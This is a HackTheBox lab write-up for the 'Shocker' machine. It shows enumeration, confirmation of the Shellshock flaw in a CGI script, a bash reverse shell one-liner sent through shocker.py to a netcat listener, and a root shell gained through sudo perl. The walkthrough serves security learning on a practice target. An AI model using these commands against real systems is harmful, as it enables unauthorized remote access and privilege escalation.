HacktheBox - Shocker Writeup

16/09/2019

Initial Enumeration

1. Nmap Scan

Let's start with a scan of the target ip address:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.56

From the nmap scan we see that port 80 and port 2222 are open. Port 2222 is interesting because ssh is normally on port 22. Althought the apache version is outdated, I'm sure that this isnt going to help in our quest for root. 

2. Port 80 Enumeration 

After browsing to 10.10.10.56 we get a webpage with an image and what may be a hint. 

Let's start dirbuster and see if there are any hidden directories:

Dirbuster found that the web server has a cgi-bin directory but as it has a 403 forbidden response code we cannot access it directly. 

I'm going to run another dirbuster scan and look for anything interesting in the cgi-bin directory itself, this time I will add a couple more possible file extensions to search for.  

Ah ha! This time dirbuster finds a file called user.sh inside the cgi-bin directory! We can browse to that file in the browser and save it to our machine and analyse the file's contents. 

nano user.sh 

So this script indicates that the web server has this cgi script executing bash. 

With the find of the user.sh script inside the cgi-bin directory and as the name of the machine is 'shocker' I think that this machine is vulnerable to the shellshock vulnerability. 

3. Confirmation of shellshock vulnerability 

I used the nmap nse http-shellshock script to confirm that the machine is vulnerable to shellshock. For the nse script to work on this machine, the script needs editing. 

vi /usr/share/nmap/scripts/http-shellshock.nse

This line needs to be removed or commented out with '--':

nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh 10.10.10.56

As you can see, the nse script shows that the machine is vulnerable to shellshock. 

Exploitation - User 

4. Finding shellshock exploit 

After looking at various possible exploits via exploitdb and searchsploit, I found a github repo that has a shellshock python script called shocker.py that allows me to input a command that I want to run on the target machine. 

git clone https://github.com/nccgroup/shocker.git

Once we have the shocker.py on our machine, we can use shocker.py to send a bash reverse shell one liner command to the machine.  

Start our netcat listener first:

nc -lvnp 9001

Then execute the shocker.py script:

./shocker.py -H 10.10.10.56 --command "/bin/bash -i >& /dev/tcp/10.10.14.24/9001 0>&1" -c /cgi-bin/user.sh -v

We now have a netcat connection to the shocker machine with the user shelly. 

The user.txt file was located in shelly's home directory: 

Privilege Escalation - Root 

Now we have an initial foothold on the machine, it is time to look for a way to root. 

5. Exploiting misconfigured sudo permissions

When it comes to priv esc I always start with the basics, checking running processes, SUID files, sudo permissions etc.. And it seems that shelly has sudo permissions to run perl as root.

sudo -l 

All we have to do to get a root shell is to run the following perl command:

sudo perl -e 'exec "bin/sh";'

We are now root!

We are able to get a fully interactive shell by running this python3 command:

python3 -c 'import pty;pty.spawn("/bin/bash");'

We can now grab the root.txt flag from inside the root directory!